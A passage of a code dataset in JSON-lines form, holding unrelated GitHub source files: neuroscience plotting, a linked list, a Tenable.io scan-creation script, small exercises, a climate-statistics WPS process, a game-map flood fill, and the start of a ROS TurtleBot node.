ax=plt.subplots(4,1, sharex=True)\n ax[1].imshow(wsmoothemcmc, aspect='auto', cmap='binary',vmax=0.02,extent=[0,plot_time[-1],0,8])\n ax[1].set_yticks(np.arange(1, 8, 1))\n ax[0].imshow(denoised, aspect='auto', cmap='binary',vmax=20,extent=[0,plot_time[-1],0,8])\n ax[0].set_yticks(np.arange(1, 8, 1))\n # ax[0].pcolor([plot_time,8],wsmoothemcmc,cmap='binary',vmax=0.02)\n # ax[0].pcolor(wsmoothemcmc,cmap='binary',vmax=0.02)\n ax[2].plot(signals.time_scale,wspeed) \n ax[3].plot(signals.time_scale,wvisstim) \n \n # fig, ax=plt.subplots(3,1, sharex=True)\n # ax[0].imshow(wsmootheddfdt_thres, aspect='auto', cmap='binary',vmax=0.02,extent=[0,plot_time[-1],0,8])\n # ax[0].set_yticks(np.arange(1, 8, 1))\n # # ax[0].pcolor([plot_time,8],wsmoothemcmc,cmap='binary',vmax=0.02)\n # # ax[0].pcolor(wsmoothemcmc,cmap='binary',vmax=0.02)\n # ax[1].plot(signals.time_scale,wspeed) \n # ax[2].plot(signals.time_scale,wvisstim) \n \n # for cell in range(7):\n for cell in pyrcellindexactivity:\n \n fig, ax=plt.subplots(4,1, sharex=True)\n ax[0].plot(plot_time,denoised[cell,:])\n ax[1].plot(plot_time,wsmoothemcmc[cell,:])\n ax[2].plot(signals.time_scale,wspeed) \n ax[3].plot(signals.time_scale,wvisstim) \n \n for cell in intercellindexactivity:\n \n fig, ax=plt.subplots(4,1, sharex=True)\n ax[0].plot(plot_time,denoised[cell,:])\n ax[1].plot(plot_time,wsmoothemcmc[cell,:])\n ax[2].plot(signals.time_scale,wspeed) \n ax[3].plot(signals.time_scale,wvisstim) \n # for cell in range(7):\n # fig, ax=plt.subplots(4,1, sharex=True)\n # ax[0].plot(plot_time,denoised[cell,:])\n # ax[1].plot(plot_time,wsmootheddfdt_thres[cell,:])\n # ax[2].plot(signals.time_scale,wspeed) \n # ax[3].plot(signals.time_scale,wvisstim) \n \n pixel_per_bar = 4\n dpi = 100\n # fig = plt.figure(figsize=(6+(200*pixel_per_bar/dpi), 10), dpi=dpi)\n fig = plt.figure(figsize=(16,9), dpi=dpi)\n ax = fig.add_axes([0.05, 0.2, 0.9, 0.7]) # span the whole figure\n # ax.set_axis_off()\n ax.imshow(analysis.corrected_traces, cmap='binary', aspect='auto',\n interpolation='nearest', norm=mpl.colors.Normalize(0, 10), extent=[0,plot_time[-1],1,131])\n ax.set_xlabel('Time (s)')\n fig.supylabel('Cell Number')\n \n fig = plt.figure(figsize=(16,9), dpi=dpi)\n\n ax = fig.add_axes([0.05, 0.2, 0.9, 0.7]) # span the whole figure\n ax.set_axis_off()\n ax.imshow(analysis.spike_traces, cmap='binary', aspect='auto',\n interpolation='nearest', norm=mpl.colors.Normalize(0, 0.02), extent=[0,plot_time[-1],1,131])\n ax.set_xlabel('Time (s)')\n fig.supylabel('Cell Number')\n \n fig = plt.figure(figsize=(16,9), dpi=dpi)\n\n ax = fig.add_axes([0.05, 0.2, 0.9, 0.7]) # span the whole figure\n ax.set_axis_off()\n ax.imshow( analysis.binary_spikes, cmap='binary', aspect='auto',\n interpolation='nearest', norm=mpl.colors.Normalize(0, 0.05), extent=[0,plot_time[-1],1,131])\n ax.set_xlabel('Time (s)')\n fig.supylabel('Cell Number')\n \n #% plotting for rafa gran\n\n plot_time =np.arange(0,wsmoothemcmc.shape[1])/caimanresults.data['ops']['init_params_caiman']['data']['fr']\n signals.time_scale\n \n \n pixel_per_bar = 4\n dpi = 100\n # fig = plt.figure(figsize=(6+(200*pixel_per_bar/dpi), 10), dpi=dpi)\n fig = plt.figure(figsize=(16,9), dpi=dpi)\n\n ax = fig.add_axes([0.05, 0.2, 0.9, 0.7]) # span the whole figure\n # ax.set_axis_off()\n ax.imshow(wsmoothemcmc, cmap='binary', aspect='auto',\n interpolation='nearest', norm=mpl.colors.Normalize(0, 0.02), extent=[0,plot_time[-1],1,131])\n ax.set_xlabel('Time (s)')\n fig.supylabel('Cell Number')\n\n fig.savefig('Full Raster'+\".svg\")\n fig.savefig('Full Raster'+\".pdf\")\n fig.savefig('Full Raster'+\".png\")\n\n\n\n fig, ax=plt.subplots(len(pyrcellindexactivity),1,figsize=(16,9), sharex=True,sharey=True)\n fig.suptitle('Pyramidal Cells', fontsize=16, y=0.95)\n fig.supylabel('Activity', x=0.08)\n fig.subplots_adjust(hspace=0)\n for i,cell in enumerate( pyrcellindexactivity):\n ax[i].plot(plot_time,wsmoothemcmc[cell,:])\n ax[i].margins(x=0)\n ax[-1].set_xlabel('Time (s)')\n\n fig.savefig('Pysamidal_Examples'+\".svg\")\n fig.savefig('Pysamidal_Examples'+\".pdf\")\n fig.savefig('Pysamidal_Examples'+\".png\")\n\n\n\n \n fig, ax=plt.subplots(len(intercellindexactivity),1,figsize=(16,9), sharex=True,sharey=True)\n fig.suptitle('Interneurons', fontsize=16,y=0.95)\n fig.supylabel('Activity', x=0.08)\n fig.subplots_adjust(hspace=0)\n for i,cell in enumerate( intercellindexactivity):\n ax[i].plot(plot_time,wsmoothemcmc[cell,:])\n ax[i].margins(x=0)\n\n ax[-1].set_xlabel('Time (s)')\n fig.savefig('Interneuron_Examples'+\".svg\")\n fig.savefig('Interneuron_Examples'+\".pdf\")\n fig.savefig('Interneuron_Examples'+\".png\")\n \n#%% opening the vis app\n if gui2:\n root = tk.Tk()\n app = ImagingSessionPanel(root, session_date=session_name, datamanaging=datamanaging)\n root.mainloop()\n # test=app.micebrought_info\n","repo_name":"Samuel8789/LabNY","sub_path":"ny_lab/gui/tabs/dataProcessing/imagingSessionPanel.py","file_name":"imagingSessionPanel.py","file_ext":"py","file_size_in_byte":56245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1279601396","text":"class Node:\n def __init__(self, dataval=None):\n self.dataval = dataval\n self.nextval = None\n\nclass SLinkedList:\n def __init__(self):\n self.headval = None\n\n def begin(self, data):\n nNode = Node(data)\n nNode.nextval = self.headval\n self.headval = nNode\n\n def end(self, data):\n nNode = Node(data)\n node = self.headval\n while node.nextval:\n node = node.nextval\n node.nextval = nNode\n\n def after(self, after, data):\n nNode = Node(data)\n node = self.headval\n # When you reach the match, set cur to data and data to next\n while node.dataval != after:\n node = node.nextval\n nNode.nextval = node.nextval\n node.nextval = nNode\n\n def cycle(self):\n def inner_cy(node):\n print(node.dataval)\n if node.nextval: inner_cy(node.nextval)\n inner_cy(self.headval)\n\n\nlist1 = SLinkedList()\nlist1.headval = Node(\"Mon\")\ne2 = Node(\"Tue\")\ne3 = Node(\"Wed\")\n# Link first Node to second node\nlist1.headval.nextval = e2\n\n# Link second Node to third node\ne2.nextval = e3\n\n# Insert at top\nlist1.begin(\"Sun\")\n\n# Insert at end\nlist1.end(\"Fri\")\n\n# Insert between\nlist1.after(\"Wed\", \"Thu\")\n\nlist1.cycle()\n","repo_name":"Hosjev/Algo","sub_path":"GeeksForGeeks/linked_list.py","file_name":"linked_list.py","file_ext":"py","file_size_in_byte":1256,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"74603063768","text":"#!/usr/bin/env python3\n#\n# \tauthor: \thttps://github.com/m0nkeyplay/\n# \tfile Date: \t2019-07-10\n#\n# \tpurpose: \tCreate a new scan based on a json file\n# Use pytenable to create the file\n# Requires: https://github.com/tenable/pyTenable\n#\n# notes: fill in the following variables as needed per environment\n# ak <-- Access Key\n# sk <-- Secret Key\n# proxies <-- If you use a proxy, set it here.\n# iUser <-- If you need to impersonate a user fill in username here\n# and uncomment tio.users.impersonate(iUser) at the end of the script\nimport logging\nimport requests\nimport json\nimport os\nimport time\nimport datetime\nimport sys\nimport signal\nfrom tenable.io import TenableIO\n\n#logging.basicConfig(level=logging.DEBUG)\n\nhello = '##########################################################################\\n'\nhello +='#\\n'\nhello +='# ^^^^Tenable IO Scan Creator^^^^\\n'\nhello +='#\\n'\nhello +='# Gather data...\\n'\nhello +='# Create a json template...\\n'\nhello +='# Stop all those clicks in the GUI :-) \\n'\nhello +='##########################################################################\\n'\n\nholdOnCowboy = '++++ It looks like the environment isn\\'t set up yet.'\nholdOnCowboy +='\\nPlease set up the environmental variables first. (ak and sk)\\n'\nholdOnCowboy +='Once those are set you should be on your way.'\n\nlameCreateError = 'Fatal Error. Scan was not created.'\nlameCreateError += 'Hopefully there is a more indepth error message above this?'\n\n# CTRL+C handler - from https:/gist.github.com/mikerr/6389549\ndef handler(signum, frame):\n print(\"\\n^^^^^^Task aborted by user. Some cleanup may be necessary.\")\n exit(0)\n\nsignal.signal(signal.SIGINT,handler)\n\n# Environment Variables\nlog_time = datetime.datetime.now().strftime('%Y%B%d%H%M%p')\ncwd = os.getcwd()\nak = ''\nsk = ''\niUser = ''\n\nproxies = {}\nproxies['https']= ''\nproxies['http']= ''\n\ntry:\n ak\n sk\n tio = TenableIO(ak,sk,proxies=proxies)\nexcept:\n print(holdOnCowboy)\n exit()\n\nh_key_data = 'accessKey='+ak+'; secretKey='+sk\n\nheaders = {}\nheaders['content-type']= 'application/json'\nheaders['x-apikeys']= h_key_data\n\n# URLs for environment data\nscan_template_url = 'https://cloud.tenable.com/editor/scan/templates'\npolicy_template_url = 'https://cloud.tenable.com/editor/policy/templates'\nscanners_url = 'https://cloud.tenable.com/scanners'\ncredentials_url = 'https://cloud.tenable.com/credentials'\npolicy_url = 'https://cloud.tenable.com/policies'\nfolders_url = 'https://cloud.tenable.com/folders'\nagent_groups_url = 'https://cloud.tenable.com/scanners/0/agent-groups'\ntimeZones_url = 'https://cloud.tenable.com/scans/timezones'\n\n\n# Loopy functions\ndef explode_dictionary(item):\n for k,v in item.items():\n if type(v) is dict:\n explode_dictionary(v)\n else:\n print(str(k)+': '+str(v))\n\ndef print_data(log_file,**kwargs):\n for k, v in kwargs.items():\n if type(v) is dict:\n log_file.write(k+':\\n')\n print_data(log_file,**v)\n else:\n log_file.write(\"{}: {}\\n\".format(k,v))\n\ndef create_log(url,loopThrough):\n log_name = 'IO_'+loopThrough+'-'+log_time+'.txt'\n log = open(cwd+'/logs/'+log_name, 'w')\n r = requests.get(url, proxies=proxies, headers=headers)\n data = r.json()\n for d in data[loopThrough]:\n print_data(log,**d)\n log.write(\"***********************\\n\")\n log.close()\n print(log_name+\" was successfully written to logs/ \")\n\n# Check for the json file\n# This does not check if it's valid - just that it exists\ndef check_jsonFile():\n theJSON = True\n print(\"We will need a valid json.\")\n while theJSON:\n scanFile = input(\"Path to your JSON file please:\")\n if os.path.exists(scanFile):\n print(\"File exists. Loading it up...\")\n return scanFile\n else:\n print(\"Please provide the correct path to the json file.\")\n\n# Here we go - get interactive\nprint(hello)\nprep = True\nprint(\"The environment files creator will allow you to look for data to populate your JSON file.\")\nwhile prep:\n choice = input(\"Do you want to run environment files creator? y/n: \")\n if choice.lower() == 'y' or choice == 'n':\n seePrep = choice\n break\n else:\n print(\"^^^^^ y or n please ^^^^^\")\n\nif seePrep == 'y':\n print(\"Creating your environment files. Please be patient.\\n\")\n create_log(policy_template_url,'templates')\n create_log(scanners_url,'scanners')\n create_log(policy_url,'policies')\n create_log(folders_url,'folders')\n create_log(credentials_url,'credentials')\n create_log(agent_groups_url,'groups')\n create_log(timeZones_url,'timezones')\n print(\"\\nFiles are complete.\\nTake your time. Look at the files then...\\nCreate your json.\")\n scanFile = check_jsonFile()\nelse:\n print(\"Okay. Let's get moving with the JSON file.\")\n scanFile = check_jsonFile()\n\n# Open and show the data in json for verification\nscanJson = open(scanFile, 'r')\ndata = json.load(scanJson)\nprint(\"Here is what you will be submitting:\\n\")\nfor d in data['newScan']:\n explode_dictionary(d)\n\n# Send it\ngo = input(\"\\nLook good?\\nY to go. Any other key to quit.\")\nif go.lower() == 'y':\n print(\"Attempting to create the scan.\")\n for d in data['newScan']:\n template = (d['template'])\n try:\n creds = (d['credentials'])\n except:\n creds = ''\n try:\n compliance = (d['audits'])\n except:\n compliance = ''\n try:\n # Uncommnet below if using impersonation\n #tio.users.impersonate(iUser)\n if compliance and creds:\n #Compliance Scan\n scan = tio.scans.create(template=template,credentials=creds,compliance=compliance,**d[\"settings\"])\n elif creds and not compliance:\n #A scan with Credentials\n scan = tio.scans.create(template=template,credentials=creds,**d[\"settings\"])\n else:\n #A Basic Scan\n scan = tio.scans.create(template=template,**d[\"settings\"])\n newScanName = 'newScan-'+log_time+'.txt'\n newScanLog = open(cwd+'/logs/'+newScanName, 'w')\n for k,v in scan.items():\n newScanLog.write(k+': '+str(v)+'\\n')\n print(\"New Scan created. Log file: \"+newScanName)\n newScanLog.close()\n except:\n exit(lameCreateError)\nelse:\n exit(\"That's cool. Fix that json and we can try another time.\\Bye.\")\n","repo_name":"m0nkeyplay/tenableIO-create-scan","sub_path":"createScanIO.py","file_name":"createScanIO.py","file_ext":"py","file_size_in_byte":6734,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"18595954531","text":"#take three numbers as input from the user and check the greatest of them.\n\nf=int(input(\"enter first number:\"))\ns=int(input(\"enter second number:\"))\nl=int(input(\"enter third number:\"))\nif f>s and f>l:\n\tprint(\"first number is greater\")\nelif s>f and s>l:\n\tprint(\"second number is greater\")\nelse:\n\tprint(\"third number is greater\")","repo_name":"prabhatdash/Informatics_Practices","sub_path":"class11/Question Bank/32.py","file_name":"32.py","file_ext":"py","file_size_in_byte":327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"34837114585","text":"from replit import db\n\n# db[\"test\"] = \"hello there\"\n\n#keys = db[\"test\"]\n#print(keys)\n\n# objective\n# menu add/view tweets\n# if view: get timestamp of tweet\n# key of tweets => timestamp = datetime.datetime.now()\n# view tweets, show in reverse chronological order (most recent first)\n# only show 10 at a time\n# ask user if they want to see the next 10, if not, go back to main menu\nimport os, datetime\n\ndef addTweet():\n timestamp = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\")\n value = input(\"Insert thoughts: \")\n db[timestamp] = value\n print()\n \ndef viewTweets():\n os.system(\"clear\")\n matches = db.prefix(\"2023\")\n matches = matches[::-1]\n counter = 0\n for i in matches:\n print(db[i])\n counter += 1\n if counter % 10 == 0:\n nextPage = input(\"View next page? (y/n): \")\n os.system(\"clear\")\n if nextPage.lower() == \"n\":\n break\n print()\n \nwhile True:\n print(\"Welcome to Tweeetr\")\n menu = input(\"1. Add tweet\\n2. View tweets\\n> \")\n\n if menu == \"1\":\n os.system(\"clear\")\n addTweet()\n elif menu == \"2\":\n viewTweets()\n else:\n break\n","repo_name":"alexbraic/replit_100PythonDays","sub_path":"days/day61.py","file_name":"day61.py","file_ext":"py","file_size_in_byte":1083,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"23089776989","text":"def solution(triangle):\n answer = 0\n tmp = list()\n for i in range(0, len(triangle)):\n if i == 0:\n tmp.append(triangle[i])\n continue\n\n return answer\n\nprint(solution([[7], [3, 8], [8, 1, 0], [2, 7, 4, 4], [4, 5, 2, 6, 5]]))","repo_name":"zeee1/programmers","sub_path":"src/general/DP_Ntriangle.py","file_name":"DP_Ntriangle.py","file_ext":"py","file_size_in_byte":262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71696818329","text":"from pywps.Process.Process import WPSProcess \n\nfrom os.path import expanduser\nfrom mkdir_p import *\nfrom datetime import datetime\nimport base64\nimport time\nfrom clipc_combine_process import extractnuts\n\nhome = expanduser(\"~\")\n\nimport logging;\nlogging.debug(\"Something has been debugged\")\n\n# python\n# clipc combine process\n# combine two netCDFs\n# knmi team\n# authors: maarten, andrej\n# clipc@knmi.nl\n#\n\n\nclass Process(WPSProcess):\n def __init__(self):\n # init process\n WPSProcess.__init__(self,\n identifier=\"clipc_extractnuts_execute\", #the same as the file name\n title=\"CLIPC Create statistics per NUTS region Execute\",\n version = \"1.0\",\n storeSupported = \"true\",\n statusSupported = \"true\",\n abstract=\"The NUTS extractor calculates statistics for any NetCDF file by extracting geographical areas defined in a GeoJSON file. The statistics per geographical area include minimum, maximum, mean and standard deviation. The statistics are presented in a CSV table and a NetCDF file.\",\n grassLocation =False)\n \n self.input1 = self.addLiteralInput(identifier=\"input1\",\n title=\"File A\",\n abstract=\"application/netcdf\",\n default = \"http://opendap.knmi.nl/knmi/thredds/dodsC/CLIPC/storyline_urbanheat/geojson/NUTS_2010_L0.geojson.nc\",\n type = type(\"String\")) \n\n self.input2 = self.addLiteralInput(identifier=\"input2\",\n title=\"File B\",\n abstract=\"application/netcdf\",\n default = \"http://opendap.knmi.nl/knmi/thredds/dodsC/IS-ENES/TESTSETS/tas_day_EC-EARTH_rcp26_r8i1p1_20060101-20251231.nc\",\n type = type(\"String\")) \n\n self.bbox = self.addLiteralInput(identifier = \"bbox\",title = \"Bounding box\",type=\"String\",minOccurs=4,maxOccurs=4,default=\"-40,20,60,85\")\n self.time2 = self.addLiteralInput(identifier = \"time2\",title = \"Time B\",type=\"String\",minOccurs=1,maxOccurs=1,default=\"2016-08-29T12:00:00Z\")\n self.width = self.addLiteralInput(identifier = \"width\" ,title = \"Width\" ,type=\"String\",minOccurs=1,maxOccurs=1,default=\"1500\")\n self.height = self.addLiteralInput(identifier = \"height\" ,title = \"Height\" ,type=\"String\",minOccurs=1,maxOccurs=1,default=\"1500\")\n self.crs = self.addLiteralInput(identifier = \"crs\" ,title = \"Coordinate reference system\" ,type=\"String\",minOccurs=1,maxOccurs=1,default=\"EPSG:4326\")\n self.tags = self.addLiteralInput(identifier = \"tags\",title = \"Your tag for this process\",type=\"String\",default=\"provenance_research_knmi\");\n self.netcdfnutsstatfilename = self.addLiteralInput(identifier=\"netcdfnutsstatfilename\",title = \"NetCDF outputfile with geographical statistics\",type=\"String\",default=\"nutstat.nc\")\n self.csvnutsstatfilename = self.addLiteralInput(identifier=\"csvnutsstatfilename\",title = \"CSV outputfile with statistics in table form\",type=\"String\",default=\"nutstat.csv\")\n \n self.netcdfnutsstatout = self.addLiteralOutput(identifier = \"netcdfnutsstatout\",title = \"NetCDF outputfile with geographical statistics\");\n self.csvnutsstatout = self.addLiteralOutput(identifier = \"csvnutsstatout\",title = \"CSV outputfile with statistics in table form\");\n self.csvnutsstatdata = self.addLiteralOutput(identifier = \"csvnutsstatdata\",title = \"CSV with statistics in table form\");\n\n\n def callback(self,message,percentage):\n self.status.set(\"Processing: [%s]\" % message,percentage);\n \n def execute(self):\n def callback(message,percentage):\n self.callback(message,percentage)\n tmpFolderPath=os.getcwd()\n os.chdir(home)\n\n\n self.status.set(\"Preparing....\", 0)\n \n pathToAppendToOutputDirectory = \"/WPS_\"+self.identifier+\"_\" + datetime.now().strftime(\"%Y%m%dT%H%M%SZ\")\n \n \"\"\" URL output path \"\"\"\n fileOutURL = os.environ['POF_OUTPUT_URL'] + pathToAppendToOutputDirectory+\"/\"\n \n \"\"\" Internal output path\"\"\"\n fileOutPath = os.environ['POF_OUTPUT_PATH'] + pathToAppendToOutputDirectory +\"/\"\n\n \"\"\" Create output directory \"\"\"\n mkdir_p(fileOutPath)\n self.status.set(\"Starting....\", 1)\n \n bbox = self.bbox.getValue()[0]+\",\"+self.bbox.getValue()[1]+\",\"+self.bbox.getValue()[2]+\",\"+self.bbox.getValue()[3];\n time2 = self.time2.getValue();\n width = int(self.width.getValue())\n height = int(self.height.getValue())\n\n CSV = extractnuts.nutsCombine(self.input1.getValue(),\n self.input2.getValue(),\n bbox= bbox,\n time=time2,\n width=width,\n height=height,\n crs= self.crs.getValue(),\n outncfile=fileOutPath+self.netcdfnutsstatfilename.getValue(),\n outcsvfile=fileOutPath+self.csvnutsstatfilename.getValue(),\n callback=callback) \n\n #The final answer \n self.netcdfnutsstatout.setValue(fileOutURL+\"/\"+self.netcdfnutsstatfilename.getValue());\n self.csvnutsstatout.setValue(fileOutURL+\"/\"+self.csvnutsstatfilename.getValue());\n self.csvnutsstatdata.setValue(\"base64:\"+base64.b64encode(CSV));\n self.status.set(\"Finished....\", 100) \n","repo_name":"KNMI/impactwps","sub_path":"clipc_extractnuts_execute.py","file_name":"clipc_extractnuts_execute.py","file_ext":"py","file_size_in_byte":5639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"44999189457","text":"\"\"\"Offload some of block hidden map functionality due to function size\nget/set functions are still in block\n\"\"\"\n\nimport logging\nfrom collections import deque\n\nfrom .game import Game\nfrom .util import get_neighbors\n\nlog = logging.getLogger(__name__)\n\nclass HitSearchLimit(Exception):\n \"\"\"\n Exception for flood fill to throw out a tuple of already searched locations for\n The next flood search\n \"\"\"\n # pylint: disable=super-init-not-called\n # It is called right here. Thanks pylint\n def __init__(self, searched_locations):\n super(HitSearchLimit, self).__init__(\"Hit Search Limit for finding hidden area\")\n self.searched_locations = searched_locations\n\ndef generate_map(map_size):\n \"\"\"Have to generate most of the map at draw runtime due to boundry issues\"\"\"\n # TODO generate, ignore boundry tiles. Update boundry tiles when block available\n return [[None for _ in range(map_size)] for _ in range(map_size)]\n\ndef init_hidden(calling_block, x, y, cur_tile):\n \"\"\"\n For drawing. Just determines if the local tile needs to be\n hidden if it's adjacent to all adjacent hidden blocks\n \"\"\"\n # Get tiles adjacent to current tile and get their adjacent hiddent status\n neighbor_coords = [(x+1, y), (x, y-1), (x-1, y), (x, y+1)]\n neighbor_tiles = [calling_block.get_tile(*coord) for coord in neighbor_coords]\n adjacent_hidden_result = [neighbor_tile.adjacent_hidden for neighbor_tile in neighbor_tiles]\n\n # If the current tile is surrounded by adjacent_hidden tiles, make it hidden\n if all(adjacent_hidden_result):\n calling_block.hidden_map[x][y] = True\n # If the tile itself is not an adjacent hidden tile, then hide the surrounding tiles\n if not cur_tile.adjacent_hidden:\n for neighbor_coord in neighbor_coords:\n update_hidden(calling_block, *neighbor_coord, iteration=1)\n else:\n calling_block.hidden_map[x][y] = False\n\ndef update_hidden(calling_block, x, y, iteration=3):\n \"\"\"Updates the hidden status of a tile at x y relative to calling_block\n Used when surrounding tile state is changed\n\n iteration is for how many blocks to update surrounding it.\n \"\"\"\n # Get correct block if outside map bounds\n if 0 <= x < Game.map_size and 0 <= y < Game.map_size:\n blk = calling_block\n else:\n # Outside map bounds - get new block\n idx_mod = x // Game.map_size\n idy_mod = y // Game.map_size\n x = x % Game.map_size\n y = y % Game.map_size\n blk = calling_block.world.get(calling_block.idx + idx_mod,\n calling_block.idy + idy_mod)\n # Get surrounding tiles\n neighbor_coords = [(x+1, y), (x, y-1), (x-1, y), (x, y+1)]\n neighbor_tiles = [blk.get_tile(*coord) for coord in neighbor_coords]\n\n # Get surrounding tiles adjacent hidden attribute and map hidden\n adjacent_hidden_result = [neighbor_tile.adjacent_hidden for neighbor_tile in neighbor_tiles]\n hidden_map_result = [blk.get_hidden(*coord) for coord in neighbor_coords]\n\n # Group them together\n # If all of the surrounding tiles have either of these attributes,\n # then make the current tile hidden\n should_be_hidden = all(map(any, zip(adjacent_hidden_result, hidden_map_result)))\n\n if should_be_hidden:\n # Do not set hidden player\n if not (Game.min_x + Game.game_width//2, Game.min_y + Game.game_height//2) == (x, y):\n blk.hidden_map[x][y] = True\n else:\n blk.hidden_map[x][y] = False\n\n iteration -= 1\n # Now do this for the surrounding tiles too\n if not iteration < 0:\n for neighbor_coord in neighbor_coords:\n update_hidden(blk, *neighbor_coord, iteration=iteration)\n\n\ndef update_hidden_flood(calling_block, x, y, cur_adj_hidden, timeout_radius=Game.map_size//2):\n \"\"\" Detects hidden are or the destruction of a hidden area due to change of\n tile state from calling_block at x, y\n\n If the cur_adj_hidden at x,y changed is False, then check for destruction\n (that is cur_adj_hidden is False)\n If cur_adj_hidden at x,y is True, then check for creation of hidden area\n (that is cur_adj_hidden is True)\n\n timeout_radius\n largest possile hidden area to check for before timing out\n \"\"\"\n # PARENT function of find hidden/unhidden\n #log.info(\"flood hidden call as %dx%d\", x, y)\n if 0 <= x < Game.map_size and 0 <= y < Game.map_size:\n blk = calling_block\n else:\n # pylint: disable=duplicate-code\n # performance constrains disallow me from putting this in a function.\n idx_mod = x // Game.map_size\n idy_mod = y // Game.map_size\n x = x % Game.map_size\n y = y % Game.map_size\n blk = calling_block.world.get(calling_block.idx + idx_mod,\n calling_block.idy + idy_mod)\n\n if cur_adj_hidden:\n #log.info(\"Looking for revealed hidden area\")\n # Potentially create hidden tiles\n neighbor_coords = get_neighbors(x, y)\n valid_coords = []\n for coord in neighbor_coords:\n tile_obj = blk.get_tile(*coord)\n if not tile_obj.adjacent_hidden and not blk.get_hidden(*coord):\n valid_coords.append(coord)\n #if len(valid_coords) > 3:\n # valid_coords = []\n\n searched_locations = []\n for coord in valid_coords:\n # Don't search overlapping regions\n if coord in searched_locations:\n continue\n\n try:\n unhidden_list = flood_find_unhidden(blk, *coord, timeout_radius=timeout_radius)\n for loc in unhidden_list:\n # Do not set hidden player\n if not (Game.min_x + Game.game_width//2, Game.min_y + Game.game_height//2) == loc:\n blk.set_hidden(*loc, value=True)\n for loc in unhidden_list:\n update_hidden(blk, *loc, iteration=2)\n except HitSearchLimit as e:\n searched_locations += e.searched_locations\n\n update_hidden(blk, x, y)\n else:\n # Unmasking hidden tiles\n neighbor_coords = get_neighbors(x, y)\n valid_coords = []\n for coord in neighbor_coords:\n tile_obj = blk.get_tile(*coord)\n if not tile_obj.adjacent_hidden and blk.get_hidden(*coord):\n valid_coords.append(coord)\n\n # No need to update a tile placed in an open area\n #if len(valid_coords) > 3:\n # valid_coords = []\n searched_locations = []\n for coord in valid_coords:\n # Don't search overlapping regions\n if coord in searched_locations:\n continue\n\n try:\n hidden_list = flood_find_hidden(blk, *coord, ign_x=x, ign_y=y, timeout_radius=timeout_radius)\n for loc in hidden_list:\n blk.set_hidden(*loc, value=False)\n for loc in hidden_list:\n update_hidden(blk, *loc, iteration=1)\n except HitSearchLimit as e:\n searched_locations += e.searched_locations\n update_hidden(blk, x, y)\n\ndef flood_find_hidden(calling_block, x, y, ign_x, ign_y, timeout_radius=Game.map_size):\n \"\"\"Try to find hidden adjacent hidden tiles surrounding location\"\"\"\n # SUB function\n to_search = deque()\n found_list = set([(x, y)])\n searched_list = set([(x, y), (ign_x, ign_y)])\n\n neighbors = [(x+1, y), (x, y-1), (x-1, y), (x, y+1)]\n while True:\n for neighbor in neighbors:\n # Do not search previously searched tiles\n if neighbor in searched_list or neighbor in to_search:\n continue\n\n # Exit condition --- ground open tile\n if (not calling_block.get_tile(*neighbor).adjacent_hidden\n and calling_block.get_hidden(*neighbor)):\n if max(abs(neighbor[0] - x), abs(neighbor[1] - y)) > timeout_radius:\n print(to_search)\n raise HitSearchLimit(searched_list)\n found_list.add(neighbor)\n to_search.append(neighbor)\n else:\n searched_list.add(neighbor)\n\n # Use list like queue to to bfs search\n try:\n search_coord = to_search.popleft()\n # pylint: disable=bad-whitespace\n neighbors = [(search_coord[0]+1, search_coord[1] ),\n (search_coord[0], search_coord[1]-1),\n (search_coord[0]-1, search_coord[1] ),\n (search_coord[0], search_coord[1]+1)]\n searched_list.add(search_coord)\n except IndexError:\n return found_list\n\n# pylint: disable=too-many-arguments\ndef flood_find_unhidden(calling_block, x, y, timeout_radius=Game.map_size,\n # Optimizations\n max=max, abs=abs, set=set, deque=deque,\n IndexError=IndexError, HitSearchLimit=HitSearchLimit):\n \"\"\"Try to find unhidden non-adjacent hidden tiles surrounding location\"\"\"\n # SUB function\n log.info(\"flood_find_unhidden called\")\n to_search = deque()\n found_list = set([(x, y)])\n searched_list = set((x, y))\n\n neighbors = [(x+1, y), (x, y-1), (x-1, y), (x, y+1)]\n while True:\n for neighbor in neighbors:\n # Do not search previously searched tiles\n if neighbor in searched_list or neighbor in to_search:\n continue\n # Exit condition --- ground open tile\n if (not calling_block.get_tile(*neighbor).adjacent_hidden\n and not calling_block.get_hidden(*neighbor)):\n if max(abs(neighbor[0] - x), abs(neighbor[1] - y)) > timeout_radius:\n raise HitSearchLimit(searched_list)\n found_list.add(neighbor)\n to_search.append(neighbor)\n else:\n searched_list.add(neighbor)\n\n # Use list like queue to to bfs search\n try:\n search_coord = to_search.popleft()\n # pylint: disable=bad-whitespace\n neighbors = [(search_coord[0]+1, search_coord[1] ),\n (search_coord[0], search_coord[1]-1),\n (search_coord[0]-1, search_coord[1] ),\n (search_coord[0], search_coord[1]+1)]\n searched_list.add(search_coord)\n except IndexError:\n return found_list\n","repo_name":"brycepg/cave-dweller","sub_path":"cave_dweller/hidden_map_handler.py","file_name":"hidden_map_handler.py","file_ext":"py","file_size_in_byte":10489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9108445586","text":"import sys\nimport time\nimport rospy\nimport random\nfrom std_msgs.msg import Bool\nfrom geometry_msgs.msg import Twist\n\n\nclass TestRun:\n cmd_vel = None\n\n def __init__(self):\n rospy.init_node(\"test_run\")\n\n # Create a publisher which can \"talk\" to TurtleBot and tell it to move\n # Tip: You may need to change cmd_vel_mux/input/navi to /cmd_vel if you're not using TurtleBot2\n self.cmd_vel = rospy.Publisher('/cmd_vel', Twist, queue_size=10)\n self.do_test()\n\n def shutdown(self):\n # stop turtlebot\n rospy.loginfo(\"Stop TurtleBot\")\n # a default Twist has linear.x of 0 and angular.z of 0. So it'll stop TurtleBot\n self.cmd_vel.publish(Twist())\n\n stop_robot_runner = rospy.Publisher('/robot_runner/run_completed', Bool, queue_size=1)\n rospy.sleep(1)\n\n while True:\n if stop_robot_runner.get_num_connections() > 0:\n stop_robot_runner.publish(True)\n break\n\n # sleep 